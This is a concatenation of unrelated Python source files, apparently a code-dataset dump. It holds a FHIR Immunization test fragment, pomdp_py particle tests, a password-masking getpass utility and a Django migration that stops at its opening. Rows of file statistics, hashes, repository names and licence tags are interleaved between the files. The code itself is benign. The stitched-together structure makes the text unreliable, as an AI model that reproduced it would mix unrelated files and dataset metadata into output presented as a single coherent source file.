self.assertEqual(
inst.education[0].presentationDate.date, FHIRDate("2013-01-10").date
)
self.assertEqual(inst.education[0].presentationDate.as_json(), "2013-01-10")
self.assertEqual(
inst.education[0].publicationDate.date, FHIRDate("2012-07-02").date
)
self.assertEqual(inst.education[0].publicationDate.as_json(), "2012-07-02")
self.assertEqual(inst.expirationDate.date, FHIRDate("2015-02-15").date)
self.assertEqual(inst.expirationDate.as_json(), "2015-02-15")
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].code), force_bytes("private")
)
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-funding-source"
),
)
self.assertEqual(force_bytes(inst.id), force_bytes("example"))
self.assertEqual(
force_bytes(inst.identifier[0].system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier[0].value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"),
)
self.assertTrue(inst.isSubpotent)
self.assertEqual(force_bytes(inst.lotNumber), force_bytes("AAJN11K"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.note[0].text),
force_bytes("Notes on adminstration of vaccine"),
)
self.assertEqual(inst.occurrenceDateTime.date, FHIRDate("2013-01-10").date)
self.assertEqual(inst.occurrenceDateTime.as_json(), "2013-01-10")
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].code), force_bytes("OP")
)
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].code), force_bytes("AP")
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertTrue(inst.primarySource)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].code),
force_bytes("ineligible"),
)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-program-eligibility"
),
)
self.assertEqual(
force_bytes(inst.reasonCode[0].coding[0].code), force_bytes("429060002")
)
self.assertEqual(
force_bytes(inst.reasonCode[0].coding[0].system),
force_bytes("http://snomed.info/sct"),
)
self.assertEqual(force_bytes(inst.route.coding[0].code), force_bytes("IM"))
self.assertEqual(
force_bytes(inst.route.coding[0].display),
force_bytes("Injection, intramuscular"),
)
self.assertEqual(
force_bytes(inst.route.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/v3-RouteOfAdministration"
),
)
self.assertEqual(force_bytes(inst.site.coding[0].code), force_bytes("LA"))
self.assertEqual(
force_bytes(inst.site.coding[0].display), force_bytes("left arm")
)
self.assertEqual(
force_bytes(inst.site.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActSite"),
)
self.assertEqual(force_bytes(inst.status), force_bytes("completed"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("FLUVAX")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("urn:oid:1.2.36.1.2001.1005.17"),
)
self.assertEqual(
force_bytes(inst.vaccineCode.text), force_bytes("Fluvax (Influenza)")
)
def testImmunization2(self):
inst = self.instantiate_from("immunization-example-historical.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization2(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization2(inst2)
def implImmunization2(self, inst):
self.assertEqual(force_bytes(inst.id), force_bytes("historical"))
self.assertEqual(
force_bytes(inst.identifier[0].system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier[0].value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"),
)
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.note[0].text),
force_bytes("Notes on adminstration of a historical vaccine"),
)
self.assertEqual(
force_bytes(inst.occurrenceString), force_bytes("January 2012")
)
self.assertFalse(inst.primarySource)
self.assertEqual(
force_bytes(inst.reportOrigin.coding[0].code), force_bytes("record")
)
self.assertEqual(
force_bytes(inst.reportOrigin.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/immunization-origin"),
)
self.assertEqual(
force_bytes(inst.reportOrigin.text), force_bytes("Written Record")
)
self.assertEqual(force_bytes(inst.status), force_bytes("completed"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("GNFLU")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("urn:oid:1.2.36.1.2001.1005.17"),
)
self.assertEqual(force_bytes(inst.vaccineCode.text), force_bytes("Influenza"))
def testImmunization3(self):
inst = self.instantiate_from("immunization-example-protocol.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization3(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization3(inst2)
def implImmunization3(self, inst):
self.assertEqual(force_bytes(inst.doseQuantity.code), force_bytes("mg"))
self.assertEqual(
force_bytes(inst.doseQuantity.system),
force_bytes("http://unitsofmeasure.org"),
)
self.assertEqual(inst.doseQuantity.value, 5)
self.assertEqual(inst.expirationDate.date, FHIRDate("2018-12-15").date)
self.assertEqual(inst.expirationDate.as_json(), "2018-12-15")
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].code), force_bytes("private")
)
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-funding-source"
),
)
self.assertEqual(force_bytes(inst.id), force_bytes("protocol"))
self.assertEqual(
force_bytes(inst.identifier[0].system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier[0].value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"),
)
self.assertFalse(inst.isSubpotent)
self.assertEqual(force_bytes(inst.lotNumber), force_bytes("PT123F"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(inst.occurrenceDateTime.date, FHIRDate("2018-06-18").date)
self.assertEqual(inst.occurrenceDateTime.as_json(), "2018-06-18")
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].code), force_bytes("OP")
)
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].code), force_bytes("AP")
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertTrue(inst.primarySource)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].code),
force_bytes("ineligible"),
)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-program-eligibility"
),
)
self.assertEqual(inst.protocolApplied[0].doseNumberPositiveInt, 1)
self.assertEqual(
force_bytes(inst.protocolApplied[0].series), force_bytes("2-dose")
)
self.assertEqual(
force_bytes(inst.protocolApplied[0].targetDisease[0].coding[0].code),
force_bytes("40468003"),
)
self.assertEqual(
force_bytes(inst.protocolApplied[0].targetDisease[0].coding[0].system),
force_bytes("http://snomed.info/sct"),
)
self.assertEqual(inst.protocolApplied[1].doseNumberPositiveInt, 2)
self.assertEqual(
force_bytes(inst.protocolApplied[1].series), force_bytes("3-dose")
)
self.assertEqual(
force_bytes(inst.protocolApplied[1].targetDisease[0].coding[0].code),
force_bytes("66071002"),
)
self.assertEqual(
force_bytes(inst.protocolApplied[1].targetDisease[0].coding[0].system),
force_bytes("http://snomed.info/sct"),
)
self.assertEqual(force_bytes(inst.route.coding[0].code), force_bytes("IM"))
self.assertEqual(
force_bytes(inst.route.coding[0].display),
force_bytes("Injection, intramuscular"),
)
self.assertEqual(
force_bytes(inst.route.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/v3-RouteOfAdministration"
),
)
self.assertEqual(force_bytes(inst.site.coding[0].code), force_bytes("LA"))
self.assertEqual(
force_bytes(inst.site.coding[0].display), force_bytes("left arm")
)
self.assertEqual(
force_bytes(inst.site.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActSite"),
)
self.assertEqual(force_bytes(inst.status), force_bytes("completed"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("104")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("http://hl7.org/fhir/sid/cvx"),
)
self.assertEqual(
force_bytes(inst.vaccineCode.text), force_bytes("Twinrix (HepA/HepB)")
)
def testImmunization4(self):
inst = self.instantiate_from("immunization-example-refused.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization4(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization4(inst2)
def implImmunization4(self, inst):
self.assertEqual(force_bytes(inst.id), force_bytes("notGiven"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(inst.occurrenceDateTime.date, FHIRDate("2013-01-10").date)
self.assertEqual(inst.occurrenceDateTime.as_json(), "2013-01-10")
self.assertTrue(inst.primarySource)
self.assertEqual(force_bytes(inst.status), force_bytes("not-done"))
self.assertEqual(
force_bytes(inst.statusReason.coding[0].code), force_bytes("MEDPREC")
)
self.assertEqual(
force_bytes(inst.statusReason.coding[0].display),
force_bytes("medical precaution"),
)
self.assertEqual(
force_bytes(inst.statusReason.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("01")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].display), force_bytes("DTP")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("http://hl7.org/fhir/sid/cvx"),
)
def testImmunization5(self):
inst = self.instantiate_from("immunization-example-subpotent.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization5(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization5(inst2)
def implImmunization5(self, inst):
self.assertEqual(force_bytes(inst.doseQuantity.code), force_bytes("ml"))
self.assertEqual(
force_bytes(inst.doseQuantity.system),
force_bytes("http://unitsofmeasure.org"),
)
self.assertEqual(inst.doseQuantity.value, 0.5)
self.assertEqual(
force_bytes(inst.education[0].documentType),
force_bytes("253088698300010311120702"),
)
self.assertEqual(
inst.education[0].presentationDate.date, FHIRDate("2013-01-10").date
)
self.assertEqual(inst.education[0].presentationDate.as_json(), "2013-01-10")
self.assertEqual(
inst.education[0].publicationDate.date, FHIRDate("2012-07-02").date
)
self.assertEqual(inst.education[0].publicationDate.as_json(), "2012-07-02")
self.assertEqual(inst.expirationDate.date, FHIRDate("2015-02-28").date)
self.assertEqual(inst.expirationDate.as_json(), "2015-02-28")
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].code), force_bytes("private")
)
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-funding-source"
),
)
self.assertEqual(force_bytes(inst.id), force_bytes("subpotent"))
self.assertEqual(
force_bytes(inst.identifier[0].system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier[0].value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"),
)
self.assertFalse(inst.isSubpotent)
self.assertEqual(force_bytes(inst.lotNumber), force_bytes("AAJN11K"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.note[0].text),
force_bytes("Notes on adminstration of vaccine"),
)
self.assertEqual(inst.occurrenceDateTime.date, FHIRDate("2015-01-15").date)
self.assertEqual(inst.occurrenceDateTime.as_json(), "2015-01-15")
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].code), force_bytes("OP")
)
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].code), force_bytes("AP")
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertTrue(inst.primarySource)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].code),
force_bytes("ineligible"),
)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-program-eligibility"
),
)
self.assertEqual(force_bytes(inst.route.coding[0].code), force_bytes("IM"))
self.assertEqual(
force_bytes(inst.route.coding[0].display),
force_bytes("Injection, intramuscular"),
)
self.assertEqual(
force_bytes(inst.route.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/v3-RouteOfAdministration"
),
)
self.assertEqual(force_bytes(inst.site.coding[0].code), force_bytes("LT"))
self.assertEqual(
force_bytes(inst.site.coding[0].display), force_bytes("left thigh")
)
self.assertEqual(
force_bytes(inst.site.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActSite"),
)
self.assertEqual(force_bytes(inst.status), force_bytes("completed"))
self.assertEqual(
force_bytes(inst.subpotentReason[0].coding[0].code), force_bytes("partial")
)
self.assertEqual(
force_bytes(inst.subpotentReason[0].coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-subpotent-reason"
),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("GNHEP")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("urn:oid:1.2.36.1.2001.1005.17"),
)
self.assertEqual(force_bytes(inst.vaccineCode.text), force_bytes("Hepatitis B"))
| 42.42278 | 88 | 0.625028 | 2,385 | 21,975 | 5.642348 | 0.097275 | 0.188006 | 0.187263 | 0.234079 | 0.895148 | 0.88519 | 0.876793 | 0.84209 | 0.817121 | 0.79245 | 0 | 0.041302 | 0.240865 | 21,975 | 517 | 89 | 42.504836 | 0.765376 | 0.008009 | 0 | 0.603272 | 0 | 0.00818 | 0.16103 | 0.021798 | 0 | 0 | 0 | 0 | 0.351738 | 1 | 0.022495 | false | 0 | 0.01636 | 0 | 0.042945 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
64e5ed45e80438a3cebbc194dccf86b617bb2922 | 1,792 | py | Python | tests/test_particles.py | justinchiu/pomdp-py | 27fd8cc3b215b428289d89ec9ed44d88910fc4ea | [
"MIT"
] | 87 | 2020-02-16T03:12:10.000Z | 2022-03-31T08:38:10.000Z | tests/test_particles.py | justinchiu/pomdp-py | 27fd8cc3b215b428289d89ec9ed44d88910fc4ea | [
"MIT"
] | 15 | 2020-08-01T00:25:33.000Z | 2022-02-19T22:37:11.000Z | tests/test_particles.py | justinchiu/pomdp-py | 27fd8cc3b215b428289d89ec9ed44d88910fc4ea | [
"MIT"
] | 26 | 2020-02-20T01:15:33.000Z | 2022-03-30T16:21:37.000Z | import pomdp_py
import random
description = "testing particle representation"
def test_particles():
random_dist = {}
total_prob = 0
for v in range(4):
random_dist[f"x{v}"] = random.uniform(0, 1)
total_prob += random_dist[f"x{v}"]
for v in random_dist:
random_dist[v] /= total_prob
particles = pomdp_py.Particles.from_histogram(pomdp_py.Histogram(random_dist), num_particles=int(1e6))
for v in random_dist:
assert abs(particles[v] - random_dist[v]) <= 2e-3
counts = {}
total = int(1e6)
for i in range(total):
v = particles.random()
counts[v] = counts.get(v, 0) + 1
for v in counts:
counts[v] /= total
for v in random_dist:
assert abs(counts[v] - random_dist[v]) <= 2e-3
assert particles.mpe() == pomdp_py.Histogram(random_dist).mpe()
def test_weighted_particles():
random_dist = {}
total_prob = 0
for v in range(5):
random_dist[f"x{v}"] = random.uniform(0, 1)
total_prob += random_dist[f"x{v}"]
for v in random_dist:
random_dist[v] /= total_prob
particles = pomdp_py.WeightedParticles.from_histogram(pomdp_py.Histogram(random_dist))
assert abs(sum(particles[v] for v, _ in particles) - 1.0) <= 1e-6
for v in random_dist:
assert abs(particles[v] - random_dist[v]) <= 2e-3
counts = {}
total = int(1e6)
for i in range(total):
v = particles.random()
counts[v] = counts.get(v, 0) + 1
for v in counts:
counts[v] /= total
for v in random_dist:
assert abs(counts[v] - random_dist[v]) <= 2e-3
assert particles.mpe() == pomdp_py.Histogram(random_dist).mpe()
def run():
test_particles()
test_weighted_particles()
if __name__ == "__main__":
run()
| 25.6 | 106 | 0.619978 | 264 | 1,792 | 4.007576 | 0.17803 | 0.20794 | 0.062382 | 0.068053 | 0.79017 | 0.79017 | 0.79017 | 0.716446 | 0.716446 | 0.716446 | 0 | 0.022288 | 0.248884 | 1,792 | 69 | 107 | 25.971014 | 0.763744 | 0 | 0 | 0.705882 | 0 | 0 | 0.030692 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 1 | 0.058824 | false | 0 | 0.039216 | 0 | 0.098039 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
56c2bb9a6b2db2a0e56ffd487a5f806a1b1c877d | 3,877 | py | Python | SIAModel30/stdiomaskforsia.py | SergentLime/SIA---Smart-Interactive-App | e7afedf01519bca4750101a67f12e2081d4cf171 | [
"Apache-2.0"
] | null | null | null | SIAModel30/stdiomaskforsia.py | SergentLime/SIA---Smart-Interactive-App | e7afedf01519bca4750101a67f12e2081d4cf171 | [
"Apache-2.0"
] | null | null | null | SIAModel30/stdiomaskforsia.py | SergentLime/SIA---Smart-Interactive-App | e7afedf01519bca4750101a67f12e2081d4cf171 | [
"Apache-2.0"
] | 1 | 2019-05-12T09:50:19.000Z | 2019-05-12T09:50:19.000Z | # Stdio Mask for SIA
# By Al Sweigart al@inventwithpython.com
# And used by MrGreen
__version__ = '0.0.3'
import sys
if sys.platform == 'win32':
from msvcrt import getch
def getpass(prompt='Password: ', mask='*'):
if not isinstance(prompt, str):
raise TypeError('prompt argument must be a str, not %s' % type(prompt).__name__)
if not isinstance(mask, str):
raise TypeError('mask argument must be a zero- or one-character str, not %s' % type(prompt).__name__)
if len(mask) > 1:
raise ValueError('mask argument must be a zero- or one-character str')
if mask == '' or sys.stdin is not sys.__stdin__:
# Fall back on getpass if a mask is not needed.
import getpass as gp
return gp.getpass(prompt)
enteredPassword = []
sys.stdout.write(prompt)
sys.stdout.flush()
while True:
key = ord(getch())
if key == 13: # Enter key pressed.
sys.stdout.write('\n')
return ''.join(enteredPassword)
elif key in (8, 127): # Backspace/Del key erases previous output.
if len(enteredPassword) > 0:
# Erases previous character.
sys.stdout.write('\b' + ' ' + '\b')
sys.stdout.flush()
enteredPassword = enteredPassword[:-1]
elif 0 <= key <= 31:
# Do nothing for unprintable characters.
# TODO: Handle Esc, F1-F12, arrow keys, home, end, insert, del, pgup, pgdn
pass
else:
# Key is part of the password; display the mask character.
char = chr(key)
sys.stdout.write(mask)
sys.stdout.flush()
enteredPassword.append(char)
else: # macOS and Linux
import tty, termios
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def getpass(prompt='Password: ', mask='*'):
if not isinstance(prompt, str):
raise TypeError('prompt argument must be a str, not %s' % (type(prompt).__name__))
if not isinstance(mask, str):
raise TypeError('mask argument must be a zero- or one-character str, not %s' % (type(prompt).__name__))
if len(mask) > 1:
raise ValueError('mask argument must be a zero- or one-character str')
if mask == '' or sys.stdin is not sys.__stdin__:
# Fall back on getpass if a mask is not needed.
import getpass as gp
return gp.getpass(prompt)
enteredPassword = []
sys.stdout.write(prompt)
sys.stdout.flush()
while True:
key = ord(getch())
if key == 13: # Enter key pressed.
sys.stdout.write('\n')
return ''.join(enteredPassword)
elif key in (8, 127): # Backspace/Del key erases previous output.
if len(enteredPassword) > 0:
# Erases previous character.
sys.stdout.write('\b' + ' ' + '\b')
sys.stdout.flush()
enteredPassword = enteredPassword[:-1]
elif 0 <= key <= 31:
# Do nothing for unprintable characters.
# TODO: Handle Esc, F1-F12, arrow keys, home, end, insert, del, pgup, pgdn
pass
else:
# Key is part of the password; display the mask character.
char = chr(key)
sys.stdout.write(mask)
sys.stdout.flush()
enteredPassword.append(char)
| 38.77 | 115 | 0.534692 | 447 | 3,877 | 4.57047 | 0.268456 | 0.061674 | 0.054821 | 0.044053 | 0.848752 | 0.848752 | 0.848752 | 0.848752 | 0.848752 | 0.848752 | 0 | 0.014587 | 0.363425 | 3,877 | 99 | 116 | 39.161616 | 0.813209 | 0.180294 | 0 | 0.76 | 0 | 0 | 0.106363 | 0 | 0 | 0 | 0 | 0.010101 | 0 | 1 | 0.04 | false | 0.24 | 0.066667 | 0 | 0.173333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
56d976f071c11de51cef9fc05ef12c4359f20494 | 24,159 | py | Python | forms/migrations/0052_make_fields_nullable_20200907_0936.py | CodeForAfrica/gmmp | d7ffe2dac16bd57e81bb3555ddea9df1fe7e9ebf | [
"Apache-2.0"
] | 4 | 2020-01-05T09:14:19.000Z | 2022-02-17T03:22:09.000Z | forms/migrations/0052_make_fields_nullable_20200907_0936.py | CodeForAfrica/gmmp | d7ffe2dac16bd57e81bb3555ddea9df1fe7e9ebf | [
"Apache-2.0"
] | 68 | 2019-12-23T02:19:55.000Z | 2021-04-23T06:13:36.000Z | forms/migrations/0052_make_fields_nullable_20200907_0936.py | CodeForAfrica/gmmp | d7ffe2dac16bd57e81bb3555ddea9df1fe7e9ebf | [
"Apache-2.0"
] | 2 | 2020-11-07T12:23:21.000Z | 2021-11-07T18:21:31.000Z | # Generated by Django 2.2.16 on 2020-09-07 09:36
from django.db import migrations, models
# NOTE(review): this is an auto-generated migration.  The original file
# repeated every choice list and help text once per model (the occupation
# list alone appeared five times); they are hoisted into the shared
# constants and field factories below.  The recorded operations are
# behaviourally identical to the generated ones.

# Choice lists shared by the person models.
_AGE_CHOICES = [(0, '(0) Do not know'), (1, '(1) 12 and under'), (2, '(2) 13-18'), (3, '(3) 19-34'), (4, '(4) 35-49'), (5, '(5) 50-64'), (6, '(6) 65-79'), (7, '(7) 80 years or more')]
_FUNCTION_CHOICES = [(0, '(0) Do not know'), (1, '(1) Subject'), (2, '(2) Spokesperson'), (3, '(3) Expert or commentator'), (4, '(4) Personal Experience'), (5, '(5) Eye Witness'), (6, '(6) Popular Opinion'), (7, '(7) Other')]
_SEX_CHOICES = [(1, '(1) Female'), (2, '(2) Male'), (3, '(3) Other (transgender, etc.)'), (4, '(4) Do not know')]
_PHOTO_CHOICES = [(1, '(1) Yes'), (2, '(2) No'), (3, '(3) Do not know')]
_YES_NO_CHOICES = [('Y', '(1) Yes'), ('N', '(2) No')]
_OCCUPATION_CHOICES = [(0, '(0) Not stated'), (1, '(1) Royalty, monarch, deposed monarch, etc.'), (2, '(2) Politician/ member of parliament, ...'), (3, '(3) Government employee, public servant, spokesperson, etc.'), (4, '(4) Police, military, para-military, militia, fire officer'), (5, '(5) Academic expert, lecturer, teacher'), (6, '(6) Doctor, dentist, health specialist'), (7, '(7) Health worker, social worker, childcare worker'), (8, '(8) Science/ technology professional, engineer, etc.'), (9, '(9) Media professional, journalist, film-maker, etc.'), (10, '(10) Lawyer, judge, magistrate, legal advocate, etc.'), (11, '(11) Business person, exec, manager, stock broker...'), (12, '(12) Office or service worker, non-management worker'), (13, '(13) Tradesperson, artisan, labourer, truck driver, etc.'), (14, '(14) Agriculture, mining, fishing, forestry'), (15, '(15) Religious figure, priest, monk, rabbi, mullah, nun'), (16, '(16) Activist or worker in civil society org., NGO, trade union'), (17, '(17) Sex worker'), (18, '(18) Celebrity, artist, actor, writer, singer, TV personality'), (19, '(19) Sportsperson, athlete, player, coach, referee'), (20, '(20) Student, pupil, schoolchild'), (21, '(21) Homemaker, parent (male or female)) only if no other occupation is given e.g. doctor/mother=code 6'), (22, '(22) Child, young person no other occupation given'), (23, '(23) Villager or resident no other occupation given'), (24, '(24) Retired person, pensioner no other occupation given'), (25, '(25) Criminal, suspect no other occupation given'), (26, '(26) Unemployed no other occupation given'), (27, '(27) Other only as last resort & explain')]

# Help texts shared by the person models (reproduced byte-for-byte).
_FAMILY_ROLE_HELP = "Code yes only if the word 'wife', 'husband' etc is actually used to describe the person."
_IS_QUOTED_HELP = 'A person is <strong>directly quoted</strong> if their own words are printed, e.g. "The war against terror is our first priority" said President Bush.<br/>If the story paraphrases what the person said, that is not a direct quote, e.g. President Bush said that top priority would be given to fighting the war against terror.'
_VICTIM_HELP = "You should code a person as a victim <strong>either</strong> if the word 'victim' is used to describe her/him, <strong>or</strong> if the story Implies that the person is a victim - e.g. by using language or images that evoke particular emotions such as shock, horror, pity for the person.<br/>You should code a person as a survivor <strong>either</strong> if the word 'survivor' is used to describe her/him, <strong>or</strong> if the story implies that the person is a survivor - e.g. by using language or images that evoke particular emotions such as admiration or respect for the person."
_ITEM_NUMBER_HELP = 'Write in the number that describes the position of the story within the newscast. E.g. the first story in the newscast is item 1; the seventh story is item 7.'


# Field factories: each question appears on several models, with only the
# question number in the verbose name changing.
def _age(num):
    """'Age (person appears)' question for question number ``num``."""
    return models.PositiveIntegerField(blank=True, choices=_AGE_CHOICES, null=True, verbose_name='({}) Age (person appears)'.format(num))


def _family_role(num):
    """'Family Role Given?' yes/no question."""
    return models.CharField(choices=_YES_NO_CHOICES, default='N', help_text=_FAMILY_ROLE_HELP, max_length=1, verbose_name='({}) Family Role Given?'.format(num))


def _function(num):
    """'Function in the news story' question."""
    return models.PositiveIntegerField(blank=True, choices=_FUNCTION_CHOICES, null=True, verbose_name='({}) Function in the news story'.format(num))


def _is_photograph(num):
    # NB: blank=True but (unlike the other integer questions) NOT null=True,
    # exactly as in the original generated migration.
    return models.PositiveIntegerField(blank=True, choices=_PHOTO_CHOICES, verbose_name='({}) Is there a photograph of the person in the story?'.format(num))


def _is_quoted(num):
    """'Is the person directly quoted' yes/no question."""
    return models.CharField(choices=_YES_NO_CHOICES, default='N', help_text=_IS_QUOTED_HELP, max_length=1, verbose_name='({}) Is the person directly quoted'.format(num))


def _occupation(num):
    """'Occupation or Position' question."""
    return models.PositiveIntegerField(blank=True, choices=_OCCUPATION_CHOICES, null=True, verbose_name='({}) Occupation or Position'.format(num))


def _sex(num):
    """'Sex' question."""
    return models.PositiveIntegerField(blank=True, choices=_SEX_CHOICES, null=True, verbose_name='({}) Sex'.format(num))


def _victim_or_survivor(num):
    """'victim or survivor' yes/no question."""
    return models.CharField(choices=_YES_NO_CHOICES, default='N', help_text=_VICTIM_HELP, max_length=1, verbose_name='({}) Does the story identify the person as either a victim or survivor?'.format(num))


def _item_number():
    """'Item Number' question shared by the radio and television sheets."""
    return models.PositiveIntegerField(blank=True, help_text=_ITEM_NUMBER_HELP, null=True, verbose_name='(1) Item Number')


class Migration(migrations.Migration):
    """Relax the listed coding-sheet fields so partially filled sheets can be
    saved (blank/null allowed where the generated schema previously required
    a value)."""

    dependencies = [
        ('forms', '0051_increate_people_in_the_news_age'),
    ]

    operations = [
